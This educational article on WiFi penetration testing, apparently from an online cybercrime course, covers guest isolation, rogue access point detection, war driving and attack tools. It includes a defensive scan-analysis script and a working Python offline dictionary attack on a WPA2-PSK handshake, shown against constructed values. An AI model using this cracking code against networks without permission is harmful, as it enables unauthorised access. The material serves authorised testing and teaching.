
Penetration testing for WiFi: What to look for

In this article, we explore what pentesters typically look for when pentesting WiFi networks.

Here is what pentesters typically look for when pentesting WiFi networks: a list of questions they might ask themselves to begin an initial security assessment.

Isolating external and internal access

Have external users of the WiFi (non-enterprise users such as visitors and guests) been appropriately restricted from reaching the internal network? The aim is to ensure that visitors and guests joining over WiFi cannot reach any portion of the internal network and use it to compromise other devices. In practice this means the guest SSID terminates on an isolated segment with client isolation enabled and a firewall policy that permits Internet egress only, and the test is to join the guest network and attempt to reach internal hosts.

Device configurations

Default configurations and default authentication credentials are simple and guessable, and are usually published in vendor manuals. Checks must ensure that no wireless access point or controller is still running with default settings or default administrative credentials.


Often, WiFi signals leak beyond the working enclosures of the enterprise. A typical example is being able to connect to the enterprise WiFi network from a nearby car park. Transmit power and antenna configuration on access points need to be checked so that the network is not usable from outside the physical office spaces unless this is intended.


The network should be appropriately segmented, typically so that each segment only has access to the resources its users require. For example, in an enterprise, the marketing and sales team could be placed in a single network segment, and only users in that segment are given access to the sales database.

Secure authentication

Ensure that the wireless network uses an appropriate authentication model (802.1X-based WPA2/WPA3-Enterprise rather than a single shared passphrase, where possible). For pre-shared-key networks this includes attempting to capture the four-way handshake, running an offline dictionary attack against any captured handshake, and reviewing with the client any passphrases that did not crack to assess their complexity.

Detect rogue access points

Identify rogue access points by scanning around the building and passively capturing the SSID, BSSID and signal strength of every access point seen, then comparing the results against the inventory of authorised access points.

The two attack surfaces used to exploit wireless networks are client devices and access points. Overall, the seven steps of traditional pentesting apply here too. It is quite common for a WiFi network to be part of a larger network, such as an enterprise network, so pentesting the wireless segment will be part of pentesting the enterprise network.

War driving and heat mapping

During pentests, war driving and heat mapping are the tasks unique to WiFi. War driving involves physically moving around the WiFi zones of an enterprise with a wireless scanner. It measures the signal strength of the wireless networks and how far the signal extends beyond the facility. Areas or zones where the signal extends beyond the facility need to be limited so that there is no external access.

Figure: A WiFi heat map
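The rogue access point check and the war driving survey above both boil down to the same analysis of a scan: compare every access point seen against the inventory, and look at how strongly in-scope networks are received from the survey point. The following Python script is an added example, not code from the article or from any of the tools it names. It parses a constructed CSV fragment modelled on the access-point section of airodump-ng's CSV output (the column names follow that layout; the rows, MAC addresses and SSIDs are made up), and the inventory of authorised BSSIDs and the -65 dBm "still usable from outside" threshold are assumptions for the example.

```python
import csv
import io

# Constructed scan data (not a real capture). The column layout follows the
# access-point table airodump-ng writes with --output-format csv.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2021-03-01 10:00:00, 2021-03-01 10:05:00, 6, 195, WPA2, CCMP, PSK, -41, 120, 0, 0. 0. 0. 0, 8, CorpWiFi,
00:11:22:33:44:56, 2021-03-01 10:00:00, 2021-03-01 10:05:00, 36, 866, WPA2, CCMP, MGT, -58, 98, 0, 0. 0. 0. 0, 8, CorpWiFi,
DE:AD:BE:EF:00:01, 2021-03-01 10:01:00, 2021-03-01 10:05:00, 6, 54, WPA2, CCMP, PSK, -35, 40, 0, 0. 0. 0. 0, 8, CorpWiFi,
AA:BB:CC:DD:EE:FF, 2021-03-01 10:02:00, 2021-03-01 10:05:00, 11, 54, WEP, WEP, , -70, 15, 2300, 0. 0. 0. 0, 10, CorpLegacy,
12:34:56:78:9A:BC, 2021-03-01 10:03:00, 2021-03-01 10:05:00, 1, 130, OPN, , , -82, 10, 0, 0. 0. 0. 0, 9, CafeGuest,
"""

# Assumed inventory: the BSSIDs the client says legitimately serve each SSID.
AUTHORIZED_BSSIDS = {
    "CorpWiFi": {"00:11:22:33:44:55", "00:11:22:33:44:56"},
    "CorpLegacy": {"AA:BB:CC:DD:EE:FF"},
}


def parse_airodump(text):
    """Return one dict per access point row; airodump pads fields with spaces."""
    reader = csv.DictReader(io.StringIO(text), skipinitialspace=True)
    aps = []
    for row in reader:
        if not row.get("BSSID"):
            continue
        aps.append({
            "bssid": row["BSSID"].strip().upper(),
            "essid": row["ESSID"].strip(),
            "privacy": row["Privacy"].strip(),
            "channel": int(row["channel"]),
            "power": int(row["Power"]),   # dBm; airodump reports -1 when unknown
        })
    return aps


def assess(aps, authorized, leak_threshold_dbm=-65):
    """Flag rogue APs, weak encryption on in-scope SSIDs, and in-scope APs that are
    still strongly received at the survey point (assumed to be outside the perimeter)."""
    findings = []
    for ap in aps:
        known = authorized.get(ap["essid"])
        if known is None:
            continue  # third-party network (neighbour, cafe): out of scope
        if ap["bssid"] not in known:
            findings.append(("ROGUE_AP", ap["bssid"],
                             f"'{ap['essid']}' advertised by unknown BSSID on channel {ap['channel']}"))
            continue
        if ap["privacy"] == "OPN" or "WEP" in ap["privacy"]:
            findings.append(("WEAK_ENCRYPTION", ap["bssid"], f"'{ap['essid']}' uses {ap['privacy']}"))
        if ap["power"] != -1 and ap["power"] >= leak_threshold_dbm:
            findings.append(("SIGNAL_LEAK", ap["bssid"],
                             f"'{ap['essid']}' received at {ap['power']} dBm outside the perimeter"))
    return findings


def run_survey():
    return assess(parse_airodump(SAMPLE_CSV), AUTHORIZED_BSSIDS)


if __name__ == "__main__":
    for kind, bssid, detail in run_survey():
        print(f"{kind:16} {bssid}  {detail}")
```

In the sample, the unknown BSSID broadcasting "CorpWiFi" on the same channel as a real corporate AP, and received more strongly, is the evil-twin pattern a pentester looks for; the café network is reported nowhere because it is not in scope. Pair this with a floor plan and the per-location power readings become the heat map.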

Other typical vulnerabilities stem from the configurable parts of the built-in encryption mechanisms. WEP attacks exploit the Wired Equivalent Privacy (WEP) protocol: the attacker captures a large number of initialisation vectors (IVs) from wireless traffic and recovers the WEP key statistically, regardless of how strong the key is. WPA/WPA2-Personal attacks instead capture the four-way handshake between a client and the access point and run an offline dictionary or brute-force attack against it to recover the pre-shared key (PSK); this only succeeds when the passphrase is weak, which is why the handshake capture and cracking attempt described under secure authentication is a standard test.
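To show why a captured WPA2-PSK handshake is an offline cracking target (the check described under secure authentication and in the paragraph above), the following Python script is an added example, not code from the article or from aircrack-ng. It derives the pairwise master key from a passphrase with PBKDF2, expands it to the PTK with the 802.11 PRF, and verifies the MIC on an EAPOL-Key message 2, which is exactly what aircrack-ng does for each wordlist entry against a pcap. The SSID, MAC addresses, nonces, passphrase and wordlist are all constructed for the example; the "captured" frame is generated locally rather than read from a real capture. It assumes a WPA2/CCMP network (key descriptor version 2, HMAC-SHA1 MIC); WPA3's SAE handshake has no equivalent step, because the PMK is no longer a function of the passphrase alone.

```python
import hashlib
import hmac
import struct

# All values below are constructed for the example; nothing here is from a real capture.
SSID = b"CorpWiFi"
AP_MAC = bytes.fromhex("001122334455")    # authenticator address (AA)
STA_MAC = bytes.fromhex("66778899aabb")   # supplicant address (SPA)
ANONCE = bytes(range(32))                  # AP nonce from message 1
SNONCE = bytes(range(32, 64))              # client nonce from message 2
REAL_PASSPHRASE = "Summer2019!"            # what the target network uses
WORDLIST = ["password", "letmein", "Summer2019!", "corpwifi123"]

MIC_OFFSET = 81   # EAPOL header (4) + key descriptor fields before the MIC (77)


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """PSK networks: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK and the public handshake values; PTK[0:16] is the KCK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 with the MIC field zeroed (the bytes the supplicant signs)."""
    body = (b"\x02"                  # descriptor type: RSN
            + b"\x01\x0a"            # key info: MIC set, pairwise, descriptor version 2
            + b"\x00\x10"            # key length: 16 (CCMP)
            + b"\x00" * 7 + b"\x01"  # replay counter
            + snonce
            + b"\x00" * 16           # key IV
            + b"\x00" * 8            # RSC
            + b"\x00" * 8            # reserved
            + b"\x00" * 16           # MIC (zero while computing it)
            + struct.pack(">H", 0))  # key data length (RSN IE omitted in this example)
    return b"\x02\x03" + struct.pack(">H", len(body)) + body


def captured_handshake() -> bytes:
    """Stand-in for what airodump-ng would record: message 2 signed with the real passphrase."""
    ptk = derive_ptk(pmk_from_passphrase(REAL_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    frame = build_msg2(SNONCE)
    mic = eapol_mic(ptk[:16], frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack(candidates, ssid, aa, spa, anonce, snonce, signed_frame):
    """Offline dictionary attack: recompute the MIC for each guess and compare."""
    captured_mic = signed_frame[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = signed_frame[:MIC_OFFSET] + b"\x00" * 16 + signed_frame[MIC_OFFSET + 16:]
    for guess in candidates:
        ptk = derive_ptk(pmk_from_passphrase(guess, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], zeroed), captured_mic):
            return guess
    return None


def demo_crack():
    return crack(WORDLIST, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, captured_handshake())


if __name__ == "__main__":
    print("recovered passphrase:", demo_crack())
```

Everything the attacker needs (SSID, both MAC addresses, both nonces, the signed frame) is sent in the clear, so the only cost per guess is the 4096-round PBKDF2, and a wordlist passphrase falls quickly. In a real test you would capture with airodump-ng and feed the pcap and wordlist to aircrack-ng rather than reimplementing this; the point of the check is whether the client's passphrase is in reach of such a wordlist.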

WiFi pentesting tools

Here are a few tools that can be used for pentesting WiFi. These utilities can monitor packets, act as rogue access points, and launch attacks such as replay, deauthentication and man-in-the-middle, among others.

  • Aircrack-ng can monitor traffic and launch attacks that require packet injection, such as replay attacks, deauthentication and fake (rogue) access points. Starting from version 1.6, airodump-ng can detect WPA3 networks.
  • Airodump-ng is used to capture packets, including a WPA2/WPA3 handshake. However, since SAE is resistant to offline dictionary attacks, capturing a WPA3 handshake does not yield a crackable target. Other tools in the suite do not support WPA3 at present.
  • Airgeddon can detect WPA3 networks and capture packets, as it uses Aircrack-ng under the hood. Airgeddon does not currently support attacking WPA3, due to the lack of hardware support for testing purposes.
  • Hostapd enables a network interface card to act as an access point and authentication server. Hostapd version 2.7 added support for the SAE handshake, so it is possible to set up a malicious WPA3 network manually.
  • Eaphammer is a toolkit for performing targeted evil twin attacks. It uses Hostapd with support for WPA3.
  • Wifiphisher is a rogue Access Point framework for conducting Wi-Fi security testing. Wifiphisher can run on a Raspberry Pi device.
This article is from the free online course Cybercrime Prevention and Protection, created by FutureLearn - Learning For Life.
